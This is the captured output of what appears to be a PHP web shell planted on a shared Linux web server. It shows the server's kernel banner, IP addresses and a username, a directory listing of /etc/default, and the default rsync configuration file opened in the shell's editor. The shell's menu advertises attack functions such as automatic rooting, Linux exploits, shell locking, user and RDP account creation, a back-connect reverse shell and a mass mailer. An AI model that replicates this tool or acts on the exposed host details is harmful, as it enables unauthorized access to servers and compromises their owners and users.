Linux iad1-shared-b7-18 6.6.49-grsec-jammy+ #10 SMP Thu Sep 12 23:23:08 UTC 2024 x86_64
Apache
: 67.205.6.31 | : 216.73.216.47
Cant Read [ /etc/named.conf ]
8.2.29
fernandoquevedo
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
README
+ Create Folder
+ Create File
/
etc /
default /
[ HOME SHELL ]
Name
Size
Permission
Action
grub.d
[ DIR ]
drwxr-xr-x
acct
332
B
-rw-r--r--
amd64-microcode
328
B
-rw-r--r--
apache-htcacheclean
556
B
-rw-r--r--
apport
149
B
-rw-r--r--
cacerts
384
B
-rw-------
cachefilesd
368
B
-rw-r--r--
console-setup
284
B
-rw-r--r--
cron
150
B
-rw-r--r--
cryptdisks
460
B
-rw-r--r--
dbus
297
B
-rw-r--r--
debsums
233
B
-rw-r--r--
fail2ban
1.5
KB
-rw-r--r--
grub
1.59
KB
-rw-r--r--
intel-microcode
1
KB
-rw-r--r--
irqbalance
1.36
KB
-rw-r--r--
keyboard
150
B
-rw-r--r--
locale
13
B
-rw-r--r--
mdadm
854
B
-rw-r--r--
motd-news
682
B
-rw-r--r--
ndn-clientscripts
16
B
-rwxr-xr-x
ndn-debuglogging
15
B
-rwxr-xr-x
ndn-iptables
15
B
-rwxr-xr-x
networkd-dispatcher
152
B
-rw-r--r--
networking
1.01
KB
-rw-r--r--
nfs-common
793
B
-rw-r--r--
nginx
389
B
-rw-r--r--
ntp
15
B
-rw-r--r--
ntpdate
456
B
-rw-r--r--
open-iscsi
2.63
KB
-rw-r--r--
openipmi
2.24
KB
-rw-r--r--
pollinate
363
B
-rw-r--r--
portmap.tp
48
B
-rw-r--r--
proftpd
211
B
-rw-r--r--
proftpd.dpkg-dist
173
B
-rw-r--r--
rpcbind
356
B
-rw-r--r--
rsync
2.01
KB
-rw-r--r--
runit
171
B
-rw-r--r--
slrn
401
B
-rw-r--r--
smartmontools
363
B
-rw-r--r--
ssh
133
B
-rw-r--r--
stunnel4
492
B
-rw-r--r--
sysstat
284
B
-rw-r--r--
ufw
1.85
KB
-rw-r--r--
useradd
1.09
KB
-rw-r--r--
vector
232
B
-rw-------
yara-rt-scanner
48
B
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : rsync
# defaults file for rsync daemon mode # # This file is only used for init.d based systems! # If this system uses systemd, you can specify options etc. for rsync # in daemon mode by copying /lib/systemd/system/rsync.service to # /etc/systemd/system/rsync.service and modifying the copy; add required # options to the ExecStart line. # start rsync in daemon mode from init.d script? # only allowed values are "true", "false", and "inetd" # Use "inetd" if you want to start the rsyncd from inetd, # all this does is prevent the init.d script from printing a message # about not starting rsyncd (you still need to modify inetd's config yourself). RSYNC_ENABLE=false # which file should be used as the configuration file for rsync. # This file is used instead of the default /etc/rsyncd.conf # Warning: This option has no effect if the daemon is accessed # using a remote shell. When using a different file for # rsync you might want to symlink /etc/rsyncd.conf to # that file. # RSYNC_CONFIG_FILE= # what extra options to give rsync --daemon? # that excludes the --daemon; that's always done in the init.d script # Possibilities are: # --address=123.45.67.89 (bind to a specific IP address) # --port=8730 (bind to specified port; default 873) RSYNC_OPTS='' # run rsyncd at a nice level? # the rsync daemon can impact performance due to much I/O and CPU usage, # so you may want to run it at a nicer priority than the default priority. # Allowed values are 0 - 19 inclusive; 10 is a reasonable value. RSYNC_NICE='' # run rsyncd with ionice? # "ionice" does for IO load what "nice" does for CPU load. # As rsync is often used for backups which aren't all that time-critical, # reducing the rsync IO priority will benefit the rest of the system. # See the manpage for ionice for allowed options. # -c3 is recommended, this will run rsync IO at "idle" priority. Uncomment # the next line to activate this. # RSYNC_IONICE='-c3' # Don't forget to create an appropriate config file, # else the daemon will not start.
Close